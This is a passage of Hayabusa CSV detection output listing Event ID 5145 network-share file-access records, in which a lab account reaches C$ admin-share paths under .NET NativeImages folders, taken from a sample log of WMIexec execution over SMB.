Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.937 